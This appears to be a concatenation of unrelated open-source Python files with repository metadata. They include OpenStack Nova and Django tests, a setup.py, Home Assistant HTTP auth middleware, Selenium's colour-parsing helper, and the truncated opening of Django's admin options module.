self.stubs.Set(nova.compute.api.API, 'create', fake_create) req = fakes.HTTPRequest.blank('/fake/servers') req.method = 'POST' req.content_type = 'application/json' body = {'server': { 'name': 'server_test', 'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175', 'flavorRef': '1', }} req.body = utils.dumps(body) res = req.get_response(self.app) self.assertEqual(202, res.status_int) def test_create_server_with_hints(self): def fake_create(*args, **kwargs): self.assertEqual(kwargs['scheduler_hints'], {'a': 'b'}) return ([self.fake_instance], '') self.stubs.Set(nova.compute.api.API, 'create', fake_create) req = fakes.HTTPRequest.blank('/fake/servers') req.method = 'POST' req.content_type = 'application/json' body = { 'server': { 'name': 'server_test', 'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175', 'flavorRef': '1', }, 'os:scheduler_hints': {'a': 'b'}, } req.body = utils.dumps(body) res = req.get_response(self.app) self.assertEqual(202, res.status_int) def test_create_server_bad_hints(self): req = fakes.HTTPRequest.blank('/fake/servers') req.method = 'POST' req.content_type = 'application/json' body = { 'server': { 'name': 'server_test', 'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175', 'flavorRef': '1', }, 'os:scheduler_hints': 'here', } req.body = utils.dumps(body) res = req.get_response(self.app) self.assertEqual(400, res.status_int)
apache-2.0
rabernat/xrft
setup.py
1
1391
import os import versioneer from setuptools import setup, find_packages PACKAGES = find_packages() DISTNAME = 'xrft' LICENSE = 'MIT' AUTHOR = 'xrft Developers' AUTHOR_EMAIL = '[email protected]' URL = 'https://github.com/xgcm/xrft' CLASSIFIERS = [ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Intended Audience :: Science/Research', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Topic :: Scientific/Engineering', ] INSTALL_REQUIRES = ['xarray', 'dask', 'numpy', 'pandas', 'scipy'] EXTRAS_REQUIRE = ['cftime'] SETUP_REQUIRES = ['pytest-runner'] TESTS_REQUIRE = ['pytest >= 2.8', 'coverage'] DESCRIPTION = "Discrete Fourier Transform with xarray" def readme(): with open('README.rst') as f: return f.read() setup(name=DISTNAME, version=versioneer.get_version(), cmdclass=versioneer.get_cmdclass(), license=LICENSE, author=AUTHOR, author_email=AUTHOR_EMAIL, classifiers=CLASSIFIERS, description=DESCRIPTION, long_description=readme(), install_requires=INSTALL_REQUIRES, setup_requires=SETUP_REQUIRES, tests_require=TESTS_REQUIRE, url=URL, packages=find_packages())
mit
SexualHealthInnovations/callisto-core
callisto_core/tests/notification/test_views.py
2
1698
from unittest import skip from unittest.mock import ANY, call, patch from callisto_core.reporting.views import ReportingConfirmationView from callisto_core.tests.test_base import ReportFlowHelper as ReportFlowTestCase from callisto_core.tests.utils.api import CustomNotificationApi @skip("disabled for 2019 summer maintenance - record creation is no longer supported") class NotificationViewTest(ReportFlowTestCase): def test_submit_confirmation_admin_email(self): with patch.object(CustomNotificationApi, "_logging") as api_logging: self.client_post_report_creation() self.client_post_reporting_end_step() api_logging.assert_has_calls( [ call( notification_name=ReportingConfirmationView.admin_email_template_name ), call(report=self.report), ], any_order=True, ) def test_submit_confirmation_user_email(self): with patch.object(CustomNotificationApi, "_logging") as api_logging: self.client_post_report_creation() self.client_post_reporting_end_step() api_logging.assert_has_calls( [call(notification_name="submit_confirmation")], any_order=True ) def test_submit_confirmation_slack_notification(self): with patch.object(CustomNotificationApi, "slack_notification") as api_logging: self.client_post_report_creation() self.client_post_reporting_end_step() api_logging.assert_has_calls( [call(msg=ANY, type="submit_confirmation")], any_order=True )
agpl-3.0
lordB8r/polls
ENV/lib/python2.7/site-packages/django/contrib/sites/tests.py
94
2574
from __future__ import unicode_literals from django.conf import settings from django.contrib.sites.models import Site, RequestSite, get_current_site from django.core.exceptions import ObjectDoesNotExist from django.http import HttpRequest from django.test import TestCase from django.test.utils import override_settings class SitesFrameworkTests(TestCase): def setUp(self): Site(id=settings.SITE_ID, domain="example.com", name="example.com").save() self.old_Site_meta_installed = Site._meta.installed Site._meta.installed = True def tearDown(self): Site._meta.installed = self.old_Site_meta_installed def test_save_another(self): # Regression for #17415 # On some backends the sequence needs reset after save with explicit ID. # Test that there is no sequence collisions by saving another site. Site(domain="example2.com", name="example2.com").save() def test_site_manager(self): # Make sure that get_current() does not return a deleted Site object. s = Site.objects.get_current() self.assertTrue(isinstance(s, Site)) s.delete() self.assertRaises(ObjectDoesNotExist, Site.objects.get_current) def test_site_cache(self): # After updating a Site object (e.g. via the admin), we shouldn't return a # bogus value from the SITE_CACHE. site = Site.objects.get_current() self.assertEqual("example.com", site.name) s2 = Site.objects.get(id=settings.SITE_ID) s2.name = "Example site" s2.save() site = Site.objects.get_current() self.assertEqual("Example site", site.name) @override_settings(ALLOWED_HOSTS=['example.com']) def test_get_current_site(self): # Test that the correct Site object is returned request = HttpRequest() request.META = { "SERVER_NAME": "example.com", "SERVER_PORT": "80", } site = get_current_site(request) self.assertTrue(isinstance(site, Site)) self.assertEqual(site.id, settings.SITE_ID) # Test that an exception is raised if the sites framework is installed # but there is no matching Site site.delete() self.assertRaises(ObjectDoesNotExist, get_current_site, request) # A RequestSite is returned if the sites framework is not installed Site._meta.installed = False site = get_current_site(request) self.assertTrue(isinstance(site, RequestSite)) self.assertEqual(site.name, "example.com")
mit
JshWright/home-assistant
homeassistant/components/http/auth.py
3
1964
"""Authentication for HTTP component.""" import asyncio import hmac import logging from homeassistant.const import HTTP_HEADER_HA_AUTH from .util import get_real_ip from .const import KEY_TRUSTED_NETWORKS, KEY_AUTHENTICATED DATA_API_PASSWORD = 'api_password' _LOGGER = logging.getLogger(__name__) @asyncio.coroutine def auth_middleware(app, handler): """Authenticate as middleware.""" # If no password set, just always set authenticated=True if app['hass'].http.api_password is None: @asyncio.coroutine def no_auth_middleware_handler(request): """Auth middleware to approve all requests.""" request[KEY_AUTHENTICATED] = True return handler(request) return no_auth_middleware_handler @asyncio.coroutine def auth_middleware_handler(request): """Auth middleware to check authentication.""" # Auth code verbose on purpose authenticated = False if (HTTP_HEADER_HA_AUTH in request.headers and validate_password( request, request.headers[HTTP_HEADER_HA_AUTH])): # A valid auth header has been set authenticated = True elif (DATA_API_PASSWORD in request.GET and validate_password(request, request.GET[DATA_API_PASSWORD])): authenticated = True elif is_trusted_ip(request): authenticated = True request[KEY_AUTHENTICATED] = authenticated return handler(request) return auth_middleware_handler def is_trusted_ip(request): """Test if request is from a trusted ip.""" ip_addr = get_real_ip(request) return ip_addr and any( ip_addr in trusted_network for trusted_network in request.app[KEY_TRUSTED_NETWORKS]) def validate_password(request, api_password): """Test if password is valid.""" return hmac.compare_digest( api_password, request.app['hass'].http.api_password)
apache-2.0
xlzdew/seleniumpr
py/selenium/webdriver/support/color.py
49
11161
#!/usr/bin/python # Copyright 2011 Software Freedom Conservancy. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. RGB_PATTERN = r"^\s*rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)\s*$" RGB_PCT_PATTERN = r"^\s*rgb\(\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*\)\s*$" RGBA_PATTERN = r"^\s*rgba\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(0|1|0\.\d+)\s*\)\s*$" RGBA_PCT_PATTERN = r"^\s*rgba\(\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(0|1|0\.\d+)\s*\)\s*$" HEX_PATTERN = r"#([A-Fa-f0-9]{2})([A-Fa-f0-9]{2})([A-Fa-f0-9]{2})" HEX3_PATTERN = r"#([A-Fa-f0-9])([A-Fa-f0-9])([A-Fa-f0-9])" HSL_PATTERN = r"^\s*hsl\(\s*(\d{1,3})\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*\)\s*$" HSLA_PATTERN = r"^\s*hsla\(\s*(\d{1,3})\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*,\s*(0|1|0\.\d+)\s*\)\s*$" class Color(object): """ Color conversion support class Example: .. code-block:: python from selenium.webdriver.support.color import Color print(Color.from_string('#00ff33').rgba) print(Color.from_string('rgb(1, 255, 3)').hex) print(Color.from_string('blue').rgba) """ @staticmethod def from_string(str_): import re class Matcher(object): def __init__(self): self.match_obj = None def match(self, pattern, str_): self.match_obj = re.match(pattern, str_) return self.match_obj @property def groups(self): return () if self.match_obj is None else self.match_obj.groups() m = Matcher() if m.match(RGB_PATTERN, str_): return Color(*m.groups) elif m.match(RGB_PCT_PATTERN, str_): rgb = tuple([float(each) / 100 * 255 for each in m.groups]) return Color(*rgb) elif m.match(RGBA_PATTERN, str_): return Color(*m.groups) elif m.match(RGBA_PCT_PATTERN, str_): rgba = tuple([float(each) / 100 * 255 for each in m.groups[:3]] + [m.groups[3]]) return Color(*rgba) elif m.match(HEX_PATTERN, str_): rgb = tuple([int(each, 16) for each in m.groups]) return Color(*rgb) elif m.match(HEX3_PATTERN, str_): rgb = tuple([int(each * 2, 16) for each in m.groups]) return Color(*rgb) elif m.match(HSL_PATTERN, str_) or m.match(HSLA_PATTERN, str_): return Color._from_hsl(*m.groups) elif str_.upper() in Colors.keys(): return Colors[str_.upper()] else: raise ValueError("Could not convert %s into color" % str_) @staticmethod def _from_hsl(h, s, l, a=1): h = float(h) / 360 s = float(s) / 100 l = float(l) / 100 if s == 0: r = l g = r b = r else: luminocity2 = l * (1 + s) if l < 0.5 else l + s - l * s luminocity1 = 2 * l - luminocity2 def hue_to_rgb(lum1, lum2, hue): if hue < 0.0: hue += 1 if hue > 1.0: hue -= 1 if hue < 1.0 / 6.0: return (lum1 + (lum2 - lum1) * 6.0 * hue) elif hue < 1.0 / 2.0: return lum2 elif hue < 2.0 / 3.0: return lum1 + (lum2 - lum1) * ((2.0 / 3.0) - hue) * 6.0 else: return lum1 r = hue_to_rgb(luminocity1, luminocity2, h + 1.0 / 3.0) g = hue_to_rgb(luminocity1, luminocity2, h) b = hue_to_rgb(luminocity1, luminocity2, h - 1.0 / 3.0) return Color(r * 256, g * 256, b * 256, a) def __init__(self, red, green, blue, alpha=1): self.red = int(red) self.green = int(green) self.blue = int(blue) self.alpha = "1" if float(alpha) == 1 else str(float(alpha) or 0) @property def rgb(self): return "rgb(%d, %d, %d)" % (self.red, self.green, self.blue) @property def rgba(self): return "rgba(%d, %d, %d, %s)" % (self.red, self.green, self.blue, self.alpha) @property def hex(self): return "#%02x%02x%02x" % (self.red, self.green, self.blue) def __eq__(self, other): if isinstance(other, Color): return self.rgba == other.rgba return NotImplemented def __ne__(self, other): result = self.__eq__(other) if result is NotImplemented: return result return not result def __hash__(self): return hash((self.red, self.green, self.blue, self.alpha)) def __repr__(self): return "Color(red=%d, green=%d, blue=%d, alpha=%s)" % (self.red, self.green, self.blue, self.alpha) def __str__(self): return "Color: %s" % self.rgba # Basic, extended and transparent colour keywords as defined by the W3C HTML4 spec # See http://www.w3.org/TR/css3-color/#html4 Colors = { "TRANSPARENT": Color(0, 0, 0, 0), "ALICEBLUE": Color(240, 248, 255), "ANTIQUEWHITE": Color(250, 235, 215), "AQUA": Color(0, 255, 255), "AQUAMARINE": Color(127, 255, 212), "AZURE": Color(240, 255, 255), "BEIGE": Color(245, 245, 220), "BISQUE": Color(255, 228, 196), "BLACK": Color(0, 0, 0), "BLANCHEDALMOND": Color(255, 235, 205), "BLUE": Color(0, 0, 255), "BLUEVIOLET": Color(138, 43, 226), "BROWN": Color(165, 42, 42), "BURLYWOOD": Color(222, 184, 135), "CADETBLUE": Color(95, 158, 160), "CHARTREUSE": Color(127, 255, 0), "CHOCOLATE": Color(210, 105, 30), "CORAL": Color(255, 127, 80), "CORNFLOWERBLUE": Color(100, 149, 237), "CORNSILK": Color(255, 248, 220), "CRIMSON": Color(220, 20, 60), "CYAN": Color(0, 255, 255), "DARKBLUE": Color(0, 0, 139), "DARKCYAN": Color(0, 139, 139), "DARKGOLDENROD": Color(184, 134, 11), "DARKGRAY": Color(169, 169, 169), "DARKGREEN": Color(0, 100, 0), "DARKGREY": Color(169, 169, 169), "DARKKHAKI": Color(189, 183, 107), "DARKMAGENTA": Color(139, 0, 139), "DARKOLIVEGREEN": Color(85, 107, 47), "DARKORANGE": Color(255, 140, 0), "DARKORCHID": Color(153, 50, 204), "DARKRED": Color(139, 0, 0), "DARKSALMON": Color(233, 150, 122), "DARKSEAGREEN": Color(143, 188, 143), "DARKSLATEBLUE": Color(72, 61, 139), "DARKSLATEGRAY": Color(47, 79, 79), "DARKSLATEGREY": Color(47, 79, 79), "DARKTURQUOISE": Color(0, 206, 209), "DARKVIOLET": Color(148, 0, 211), "DEEPPINK": Color(255, 20, 147), "DEEPSKYBLUE": Color(0, 191, 255), "DIMGRAY": Color(105, 105, 105), "DIMGREY": Color(105, 105, 105), "DODGERBLUE": Color(30, 144, 255), "FIREBRICK": Color(178, 34, 34), "FLORALWHITE": Color(255, 250, 240), "FORESTGREEN": Color(34, 139, 34), "FUCHSIA": Color(255, 0, 255), "GAINSBORO": Color(220, 220, 220), "GHOSTWHITE": Color(248, 248, 255), "GOLD": Color(255, 215, 0), "GOLDENROD": Color(218, 165, 32), "GRAY": Color(128, 128, 128), "GREY": Color(128, 128, 128), "GREEN": Color(0, 128, 0), "GREENYELLOW": Color(173, 255, 47), "HONEYDEW": Color(240, 255, 240), "HOTPINK": Color(255, 105, 180), "INDIANRED": Color(205, 92, 92), "INDIGO": Color(75, 0, 130), "IVORY": Color(255, 255, 240), "KHAKI": Color(240, 230, 140), "LAVENDER": Color(230, 230, 250), "LAVENDERBLUSH": Color(255, 240, 245), "LAWNGREEN": Color(124, 252, 0), "LEMONCHIFFON": Color(255, 250, 205), "LIGHTBLUE": Color(173, 216, 230), "LIGHTCORAL": Color(240, 128, 128), "LIGHTCYAN": Color(224, 255, 255), "LIGHTGOLDENRODYELLOW": Color(250, 250, 210), "LIGHTGRAY": Color(211, 211, 211), "LIGHTGREEN": Color(144, 238, 144), "LIGHTGREY": Color(211, 211, 211), "LIGHTPINK": Color(255, 182, 193), "LIGHTSALMON": Color(255, 160, 122), "LIGHTSEAGREEN": Color(32, 178, 170), "LIGHTSKYBLUE": Color(135, 206, 250), "LIGHTSLATEGRAY": Color(119, 136, 153), "LIGHTSLATEGREY": Color(119, 136, 153), "LIGHTSTEELBLUE": Color(176, 196, 222), "LIGHTYELLOW": Color(255, 255, 224), "LIME": Color(0, 255, 0), "LIMEGREEN": Color(50, 205, 50), "LINEN": Color(250, 240, 230), "MAGENTA": Color(255, 0, 255), "MAROON": Color(128, 0, 0), "MEDIUMAQUAMARINE": Color(102, 205, 170), "MEDIUMBLUE": Color(0, 0, 205), "MEDIUMORCHID": Color(186, 85, 211), "MEDIUMPURPLE": Color(147, 112, 219), "MEDIUMSEAGREEN": Color(60, 179, 113), "MEDIUMSLATEBLUE": Color(123, 104, 238), "MEDIUMSPRINGGREEN": Color(0, 250, 154), "MEDIUMTURQUOISE": Color(72, 209, 204), "MEDIUMVIOLETRED": Color(199, 21, 133), "MIDNIGHTBLUE": Color(25, 25, 112), "MINTCREAM": Color(245, 255, 250), "MISTYROSE": Color(255, 228, 225), "MOCCASIN": Color(255, 228, 181), "NAVAJOWHITE": Color(255, 222, 173), "NAVY": Color(0, 0, 128), "OLDLACE": Color(253, 245, 230), "OLIVE": Color(128, 128, 0), "OLIVEDRAB": Color(107, 142, 35), "ORANGE": Color(255, 165, 0), "ORANGERED": Color(255, 69, 0), "ORCHID": Color(218, 112, 214), "PALEGOLDENROD": Color(238, 232, 170), "PALEGREEN": Color(152, 251, 152), "PALETURQUOISE": Color(175, 238, 238), "PALEVIOLETRED": Color(219, 112, 147), "PAPAYAWHIP": Color(255, 239, 213), "PEACHPUFF": Color(255, 218, 185), "PERU": Color(205, 133, 63), "PINK": Color(255, 192, 203), "PLUM": Color(221, 160, 221), "POWDERBLUE": Color(176, 224, 230), "PURPLE": Color(128, 0, 128), "RED": Color(255, 0, 0), "ROSYBROWN": Color(188, 143, 143), "ROYALBLUE": Color(65, 105, 225), "SADDLEBROWN": Color(139, 69, 19), "SALMON": Color(250, 128, 114), "SANDYBROWN": Color(244, 164, 96), "SEAGREEN": Color(46, 139, 87), "SEASHELL": Color(255, 245, 238), "SIENNA": Color(160, 82, 45), "SILVER": Color(192, 192, 192), "SKYBLUE": Color(135, 206, 235), "SLATEBLUE": Color(106, 90, 205), "SLATEGRAY": Color(112, 128, 144), "SLATEGREY": Color(112, 128, 144), "SNOW": Color(255, 250, 250), "SPRINGGREEN": Color(0, 255, 127), "STEELBLUE": Color(70, 130, 180), "TAN": Color(210, 180, 140), "TEAL": Color(0, 128, 128), "THISTLE": Color(216, 191, 216), "TOMATO": Color(255, 99, 71), "TURQUOISE": Color(64, 224, 208), "VIOLET": Color(238, 130, 238), "WHEAT": Color(245, 222, 179), "WHITE": Color(255, 255, 255), "WHITESMOKE": Color(245, 245, 245), "YELLOW": Color(255, 255, 0), "YELLOWGREEN": Color(154, 205, 50) }
apache-2.0
sertac/django
django/contrib/admin/options.py
126
81190
import copy import operator from collections import OrderedDict from functools import partial, reduce, update_wrapper from django import forms from django.conf import settings from django.contrib import messages from django.contrib.admin import helpers, widgets from django.contrib.admin.checks import ( BaseModelAdminChecks, InlineModelAdminChecks, ModelAdminChecks, ) from django.contrib.admin.exceptions import DisallowedModelAdminToField from django.contrib.admin.templatetags.admin_static import static from django.contrib.admin.templatetags.admin_urls import add_preserved_filters from django.contrib.admin.utils import ( NestedObjects, flatten_fieldsets, get_deleted_objects, lookup_needs_distinct, model_format_dict, quote, unquote, ) from django.contrib.auth import get_permission_codename from django.core.exceptions import ( FieldDoesNotExist, FieldError, PermissionDenied, ValidationError, ) from django.core.paginator import Paginator from django.core.urlresolvers import reverse from django.db import models, router, transaction from django.db.models.constants import LOOKUP_SEP from django.db.models.fields import BLANK_CHOICE_DASH from django.forms.formsets import DELETION_FIELD_NAME, all_valid from django.forms.models import ( BaseInlineFormSet, inlineformset_factory, modelform_defines_fields, modelform_factory, modelformset_factory, ) from django.forms.widgets import CheckboxSelectMultiple, SelectMultiple from django.http import Http404, HttpResponseRedirect from django.http.response import HttpResponseBase from django.template.response import SimpleTemplateResponse, TemplateResponse from django.utils import six from django.utils.decorators import method_decorator from django.utils.encoding import force_text, python_2_unicode_compatible from django.utils.html import escape, escapejs from django.utils.http import urlencode from django.utils.safestring import mark_safe from django.utils.text import capfirst, get_text_list from django.utils.translation import string_concat, ugettext as _, ungettext from django.views.decorators.csrf import csrf_protect from django.views.generic import RedirectView IS_POPUP_VAR = '_popup' TO_FIELD_VAR = '_to_field' HORIZONTAL, VERTICAL = 1, 2 def get_content_type_for_model(obj): # Since this module gets imported in the application's root package, # it cannot import models from other applications at the module level. from django.contrib.contenttypes.models import ContentType return ContentType.objects.get_for_model(obj, for_concrete_model=False) def get_ul_class(radio_style): return 'radiolist' if radio_style == VERTICAL else 'radiolist inline' class IncorrectLookupParameters(Exception): pass # Defaults for formfield_overrides. ModelAdmin subclasses can change this # by adding to ModelAdmin.formfield_overrides. FORMFIELD_FOR_DBFIELD_DEFAULTS = { models.DateTimeField: { 'form_class': forms.SplitDateTimeField, 'widget': widgets.AdminSplitDateTime }, models.DateField: {'widget': widgets.AdminDateWidget}, models.TimeField: {'widget': widgets.AdminTimeWidget}, models.TextField: {'widget': widgets.AdminTextareaWidget}, models.URLField: {'widget': widgets.AdminURLFieldWidget}, models.IntegerField: {'widget': widgets.AdminIntegerFieldWidget}, models.BigIntegerField: {'widget': widgets.AdminBigIntegerFieldWidget}, models.CharField: {'widget': widgets.AdminTextInputWidget}, models.ImageField: {'widget': widgets.AdminFileWidget}, models.FileField: {'widget': widgets.AdminFileWidget}, models.EmailField: {'widget': widgets.AdminEmailInputWidget}, } csrf_protect_m = method_decorator(csrf_protect) class BaseModelAdmin(six.with_metaclass(forms.MediaDefiningClass)): """Functionality common to both ModelAdmin and InlineAdmin.""" raw_id_fields = () fields = None exclude = None fieldsets = None form = forms.ModelForm filter_vertical = () filter_horizontal = () radio_fields = {} prepopulated_fields = {} formfield_overrides = {} readonly_fields = () ordering = None view_on_site = True show_full_result_count = True checks_class = BaseModelAdminChecks @classmethod def check(cls, model, **kwargs): return cls.checks_class().check(cls, model, **kwargs) def __init__(self): overrides = FORMFIELD_FOR_DBFIELD_DEFAULTS.copy() overrides.update(self.formfield_overrides) self.formfield_overrides = overrides def formfield_for_dbfield(self, db_field, **kwargs): """ Hook for specifying the form Field instance for a given database Field instance. If kwargs are given, they're passed to the form Field's constructor. """ request = kwargs.pop("request", None) # If the field specifies choices, we don't need to look for special # admin widgets - we just need to use a select widget of some kind. if db_field.choices: return self.formfield_for_choice_field(db_field, request, **kwargs) # ForeignKey or ManyToManyFields if isinstance(db_field, (models.ForeignKey, models.ManyToManyField)): # Combine the field kwargs with any options for formfield_overrides. # Make sure the passed in **kwargs override anything in # formfield_overrides because **kwargs is more specific, and should # always win. if db_field.__class__ in self.formfield_overrides: kwargs = dict(self.formfield_overrides[db_field.__class__], **kwargs) # Get the correct formfield. if isinstance(db_field, models.ForeignKey): formfield = self.formfield_for_foreignkey(db_field, request, **kwargs) elif isinstance(db_field, models.ManyToManyField): formfield = self.formfield_for_manytomany(db_field, request, **kwargs) # For non-raw_id fields, wrap the widget with a wrapper that adds # extra HTML -- the "add other" interface -- to the end of the # rendered output. formfield can be None if it came from a # OneToOneField with parent_link=True or a M2M intermediary. if formfield and db_field.name not in self.raw_id_fields: related_modeladmin = self.admin_site._registry.get(db_field.remote_field.model) wrapper_kwargs = {} if related_modeladmin: wrapper_kwargs.update( can_add_related=related_modeladmin.has_add_permission(request), can_change_related=related_modeladmin.has_change_permission(request), can_delete_related=related_modeladmin.has_delete_permission(request), ) formfield.widget = widgets.RelatedFieldWidgetWrapper( formfield.widget, db_field.remote_field, self.admin_site, **wrapper_kwargs ) return formfield # If we've got overrides for the formfield defined, use 'em. **kwargs # passed to formfield_for_dbfield override the defaults. for klass in db_field.__class__.mro(): if klass in self.formfield_overrides: kwargs = dict(copy.deepcopy(self.formfield_overrides[klass]), **kwargs) return db_field.formfield(**kwargs) # For any other type of field, just call its formfield() method. return db_field.formfield(**kwargs) def formfield_for_choice_field(self, db_field, request=None, **kwargs): """ Get a form Field for a database Field that has declared choices. """ # If the field is named as a radio_field, use a RadioSelect if db_field.name in self.radio_fields: # Avoid stomping on custom widget/choices arguments. if 'widget' not in kwargs: kwargs['widget'] = widgets.AdminRadioSelect(attrs={ 'class': get_ul_class(self.radio_fields[db_field.name]), }) if 'choices' not in kwargs: kwargs['choices'] = db_field.get_choices( include_blank=db_field.blank, blank_choice=[('', _('None'))] ) return db_field.formfield(**kwargs) def get_field_queryset(self, db, db_field, request): """ If the ModelAdmin specifies ordering, the queryset should respect that ordering. Otherwise don't specify the queryset, let the field decide (returns None in that case). """ related_admin = self.admin_site._registry.get(db_field.remote_field.model) if related_admin is not None: ordering = related_admin.get_ordering(request) if ordering is not None and ordering != (): return db_field.remote_field.model._default_manager.using(db).order_by(*ordering) return None def formfield_for_foreignkey(self, db_field, request=None, **kwargs): """ Get a form Field for a ForeignKey. """ db = kwargs.get('using') if db_field.name in self.raw_id_fields: kwargs['widget'] = widgets.ForeignKeyRawIdWidget(db_field.remote_field, self.admin_site, using=db) elif db_field.name in self.radio_fields: kwargs['widget'] = widgets.AdminRadioSelect(attrs={ 'class': get_ul_class(self.radio_fields[db_field.name]), }) kwargs['empty_label'] = _('None') if db_field.blank else None if 'queryset' not in kwargs: queryset = self.get_field_queryset(db, db_field, request) if queryset is not None: kwargs['queryset'] = queryset return db_field.formfield(**kwargs) def formfield_for_manytomany(self, db_field, request=None, **kwargs): """ Get a form Field for a ManyToManyField. """ # If it uses an intermediary model that isn't auto created, don't show # a field in admin. if not db_field.remote_field.through._meta.auto_created: return None db = kwargs.get('using') if db_field.name in self.raw_id_fields: kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.remote_field, self.admin_site, using=db) kwargs['help_text'] = '' elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)): kwargs['widget'] = widgets.FilteredSelectMultiple( db_field.verbose_name, db_field.name in self.filter_vertical ) if 'queryset' not in kwargs: queryset = self.get_field_queryset(db, db_field, request) if queryset is not None: kwargs['queryset'] = queryset form_field = db_field.formfield(**kwargs) if isinstance(form_field.widget, SelectMultiple) and not isinstance(form_field.widget, CheckboxSelectMultiple): msg = _('Hold down "Control", or "Command" on a Mac, to select more than one.') help_text = form_field.help_text form_field.help_text = string_concat(help_text, ' ', msg) if help_text else msg return form_field def get_view_on_site_url(self, obj=None): if obj is None or not self.view_on_site: return None if callable(self.view_on_site): return self.view_on_site(obj) elif self.view_on_site and hasattr(obj, 'get_absolute_url'): # use the ContentType lookup if view_on_site is True return reverse('admin:view_on_site', kwargs={ 'content_type_id': get_content_type_for_model(obj).pk, 'object_id': obj.pk }) def get_empty_value_display(self): """ Return the empty_value_display set on ModelAdmin or AdminSite. """ try: return mark_safe(self.empty_value_display) except AttributeError: return mark_safe(self.admin_site.empty_value_display) def get_fields(self, request, obj=None): """ Hook for specifying fields. """ return self.fields def get_fieldsets(self, request, obj=None): """ Hook for specifying fieldsets. """ if self.fieldsets: return self.fieldsets return [(None, {'fields': self.get_fields(request, obj)})] def get_ordering(self, request): """ Hook for specifying field ordering. """ return self.ordering or () # otherwise we might try to *None, which is bad ;) def get_readonly_fields(self, request, obj=None): """ Hook for specifying custom readonly fields. """ return self.readonly_fields def get_prepopulated_fields(self, request, obj=None): """ Hook for specifying custom prepopulated fields. """ return self.prepopulated_fields def get_queryset(self, request): """ Returns a QuerySet of all model instances that can be edited by the admin site. This is used by changelist_view. """ qs = self.model._default_manager.get_queryset() # TODO: this should be handled by some parameter to the ChangeList. ordering = self.get_ordering(request) if ordering: qs = qs.order_by(*ordering) return qs def lookup_allowed(self, lookup, value): from django.contrib.admin.filters import SimpleListFilter model = self.model # Check FKey lookups that are allowed, so that popups produced by # ForeignKeyRawIdWidget, on the basis of ForeignKey.limit_choices_to, # are allowed to work. for l in model._meta.related_fkey_lookups: # As ``limit_choices_to`` can be a callable, invoke it here. if callable(l): l = l() for k, v in widgets.url_params_from_lookup_dict(l).items(): if k == lookup and v == value: return True relation_parts = [] prev_field = None for part in lookup.split(LOOKUP_SEP): try: field = model._meta.get_field(part) except FieldDoesNotExist: # Lookups on non-existent fields are ok, since they're ignored # later. break # It is allowed to filter on values that would be found from local # model anyways. For example, if you filter on employee__department__id, # then the id value would be found already from employee__department_id. if not prev_field or (prev_field.concrete and field not in prev_field.get_path_info()[-1].target_fields): relation_parts.append(part) if not getattr(field, 'get_path_info', None): # This is not a relational field, so further parts # must be transforms. break prev_field = field model = field.get_path_info()[-1].to_opts.model if len(relation_parts) <= 1: # Either a local field filter, or no fields at all. return True clean_lookup = LOOKUP_SEP.join(relation_parts) valid_lookups = [self.date_hierarchy] for filter_item in self.list_filter: if isinstance(filter_item, type) and issubclass(filter_item, SimpleListFilter): valid_lookups.append(filter_item.parameter_name) elif isinstance(filter_item, (list, tuple)): valid_lookups.append(filter_item[0]) else: valid_lookups.append(filter_item) return clean_lookup in valid_lookups def to_field_allowed(self, request, to_field): """ Returns True if the model associated with this admin should be allowed to be referenced by the specified field. """ opts = self.model._meta try: field = opts.get_field(to_field) except FieldDoesNotExist: return False # Always allow referencing the primary key since it's already possible # to get this information from the change view URL. if field.primary_key: return True # Allow reverse relationships to models defining m2m fields if they # target the specified field. for many_to_many in opts.many_to_many: if many_to_many.m2m_target_field_name() == to_field: return True # Make sure at least one of the models registered for this site # references this field through a FK or a M2M relationship. registered_models = set() for model, admin in self.admin_site._registry.items(): registered_models.add(model) for inline in admin.inlines: registered_models.add(inline.model) related_objects = ( f for f in opts.get_fields(include_hidden=True) if (f.auto_created and not f.concrete) ) for related_object in related_objects: related_model = related_object.related_model if (any(issubclass(model, related_model) for model in registered_models) and related_object.field.remote_field.get_related_field() == field): return True return False def has_add_permission(self, request): """ Returns True if the given request has permission to add an object. Can be overridden by the user in subclasses. """ opts = self.opts codename = get_permission_codename('add', opts) return request.user.has_perm("%s.%s" % (opts.app_label, codename)) def has_change_permission(self, request, obj=None): """ Returns True if the given request has permission to change the given Django model instance, the default implementation doesn't examine the `obj` parameter. Can be overridden by the user in subclasses. In such case it should return True if the given request has permission to change the `obj` model instance. If `obj` is None, this should return True if the given request has permission to change *any* object of the given type. """ opts = self.opts codename = get_permission_codename('change', opts) return request.user.has_perm("%s.%s" % (opts.app_label, codename)) def has_delete_permission(self, request, obj=None): """ Returns True if the given request has permission to change the given Django model instance, the default implementation doesn't examine the `obj` parameter. Can be overridden by the user in subclasses. In such case it should return True if the given request has permission to delete the `obj` model instance. If `obj` is None, this should return True if the given request has permission to delete *any* object of the given type. """ opts = self.opts codename = get_permission_codename('delete', opts) return request.user.has_perm("%s.%s" % (opts.app_label, codename)) def has_module_permission(self, request): """ Returns True if the given request has any permission in the given app label. Can be overridden by the user in subclasses. In such case it should return True if the given request has permission to view the module on the admin index page and access the module's index page. Overriding it does not restrict access to 